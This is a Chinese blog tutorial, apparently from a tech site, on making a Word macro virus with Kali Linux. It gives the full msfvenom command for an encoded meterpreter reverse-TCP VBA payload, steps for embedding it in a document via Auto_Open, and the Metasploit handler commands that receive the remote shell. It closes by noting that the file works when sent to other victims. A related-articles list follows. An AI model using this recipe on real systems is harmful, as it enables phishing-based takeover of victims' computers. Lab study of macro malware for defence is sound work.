Kali渗透测试:使用Word宏病毒进行渗透攻击

简介: Kali渗透测试:使用Word宏病毒进行渗透攻击

Kali渗透测试:使用宏病毒进行渗透攻击
VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。

构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或直接删除其他文件等。Word宏和其他样式存储在模版DOT文件中, 因此总是把Word文件转成模版,再将其存储为宏。

实 验 环 境
攻击机:Linux kali 5.10.0 IP: 192.168.68.125

靶机:IE11-Win81

操 作 步 骤
1. 使用msfvenom生成VBA被控端
在Kali Linux中使用msfvenom命令生成一个VBA类型的被控端,输入如下命令:

┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

该被控端可以分为两个部分。第一个部分是包括Auto_Open在内的几个函数,如下图所示:
image.png
image.png

第二部分是一些字符形式的攻击载荷,如下图所示:

image.png

2. 使用Word制作宏文件
使用Word将上图所示 两个部分制作成可以使用的宏文件。进入装有Office的Windows系统的靶机,然后打开Word(本人使用的是2007版),单击“开发工具”,接着在工具栏单击“宏”,就会弹出一个“宏”对话框,如下图所示:

image.png

起一个宏名,然后单击“创建”按钮,打开宏编辑界面,将我们在Kali 中生成的第一部分,也就是包括Auto_Open在内的几个函数复制到Normal-NewMacros中,覆盖原来的内容。如下图所示:

image.png

然后在工具栏上单击编辑图标,返回到Word操作界面,如下图所示:

image.png

在Word操作界面中,粘贴在KaliLinux中生成的第二部分,也就是字符形式的攻击载荷部分,如下图所示:
image.png

完成之后,将该木马文件保存,如下图所示:

image.png

3. 在Kali中启动metasploit
进入metasploit,启动和设置payload并执行,命令如下:

msf6 > use exploit/multi/handler
.....
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
.....
msf6 exploit(multi/handler) > set lhost 192.168.68.125
.....
msf6 exploit(multi/handler) > set lport 4444
.....
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.68.125:4444

image.png

4. 执行宏病毒文件
现在在靶机Win8中直接双击桌面上这个生成的木马文件(上图红框所示),在Kali中可以看到获得控制权限。如下图所示:

image.png

在会话界面,执行pwd命令,dir命令 ,结果如下图所示:

image.png

如果把宏病毒文件发给其他受害者,当受害者打开这个文件,里面的恶意HTA文件就会执行。在Kali中同样会得到控制权。在此不再赘述,本人已经亲测有效。

相关文章
|
4天前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
28 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
1月前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
2月前
|
网络协议 安全 Linux
Kali渗透测试:拒绝服务攻击(一)
Kali渗透测试:拒绝服务攻击(一)
173 2
|
2月前
|
存储 网络协议 安全
Kali渗透测试:拒绝服务攻击(二)
Kali渗透测试:拒绝服务攻击(二)
245 0
|
2月前
|
安全 网络安全 数据库
Kali测试:散列密码破解(一)
Kali渗透测试:散列密码破解(一)
39 0
|
2月前
|
安全 应用服务中间件 网络安全
Kali测试:散列密码破解(二)
Kali渗透测试:散列密码破解(二)
118 0
|
2月前
|
Web App开发 测试技术 网络安全
Kali 测试:使用Burp Suite 对网络认证服务的攻击(一)
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击(一)
83 0
|
1月前
|
JSON Java 测试技术
SpringCloud2023实战之接口服务测试工具SpringBootTest
SpringBootTest同时集成了JUnit Jupiter、AssertJ、Hamcrest测试辅助库,使得更容易编写但愿测试代码。
58 3
|
2月前
|
JSON 算法 数据可视化
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
这篇文章是关于如何通过算法接口返回的目标检测结果来计算性能指标的笔记。它涵盖了任务描述、指标分析(包括TP、FP、FN、TN、精准率和召回率),接口处理,数据集处理,以及如何使用实用工具进行文件操作和数据可视化。文章还提供了一些Python代码示例,用于处理图像文件、转换数据格式以及计算目标检测的性能指标。
73 0
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
|
3月前
|
移动开发 JSON Java
Jmeter实现WebSocket协议的接口测试方法
WebSocket协议是HTML5的一种新协议,实现了浏览器与服务器之间的全双工通信。通过简单的握手动作,双方可直接传输数据。其优势包括极小的头部开销和服务器推送功能。使用JMeter进行WebSocket接口和性能测试时,需安装特定插件并配置相关参数,如服务器地址、端口号等,还可通过CSV文件实现参数化,以满足不同测试需求。
258 7
Jmeter实现WebSocket协议的接口测试方法